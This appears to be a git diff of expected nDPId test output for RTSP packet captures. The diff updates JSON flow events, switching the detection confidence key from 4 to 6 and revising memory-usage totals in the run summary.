00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1627567406342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1627567406342,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567406342,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXW0AAfwaNWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"thread_ts_msec":1627567407043,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"thread_ts_msec":1627567407043,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567466882,"flow_last_seen":1627567466882,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567466882,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1627567466882,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466882,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1627567466883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1627567466883,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567466883,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXikAAfwaNKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1627567467094,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1627567467094,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567528106,"flow_last_seen":1627567528106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1627567528106,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1627567528106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAMAAQAGAAwp8x5yLpgIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1627567528106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1627567528106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1627567528106,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXuEAAfwaM\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","packets-captured":568,"packets-processed":568,"total-skipped-flows":0,"total-l4-payload-len":67396,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1627567528308} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 568/568 @@ -51,9 +51,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5907279 bytes -~~ total memory freed........: 5907279 bytes -~~ total allocations/frees...: 118736/118736 +~~ total memory allocated....: 6040913 bytes +~~ total memory freed........: 6040913 bytes +~~ total allocations/frees...: 121498/121498 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 460 chars ~~ json string max len.......: 804 chars diff --git a/test/results/rtsp_setup_http.pcapng.out b/test/results/rtsp_setup_http.pcapng.out index 82cdb7141..43f5c895c 100644 --- a/test/results/rtsp_setup_http.pcapng.out +++ b/test/results/rtsp_setup_http.pcapng.out @@ -2,8 +2,8 @@ 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625568705778} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1625568705778,"pkt":"AAwpI6CIeCSvPj0DCABFAADbwOlAAEAGFzesHAWqrBwEGvlgIWqjD4UUiv5WgFAYA\/\/+rgAAU0VUVVAgcnRzcDovLzE3Mi4yOC40LjI2Ojg1NTQvdHJhY2tJRD04OCBSVFNQLzEuMA0KQ1NlcTogNA0KVXNlci1BZ2VudDogTGliVkxDLzMuMC4xNiAoTElWRTU1NSBTdHJlYW1pbmcgTWVkaWEgdjIwMTYuMTEuMjgpDQpUcmFuc3BvcnQ6IFJUUC9BVlA7dW5pY2FzdDtjbGllbnRfcG9ydD01MDIyMC01MDIyMQ0KDQo="} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} -00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1625568705778,"flow_last_seen":1625568705778,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1625568705778,"l3_proto":"ip4","src_ip":"172.28.5.170","dst_ip":"172.28.4.26","src_port":63840,"dst_port":8554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}} 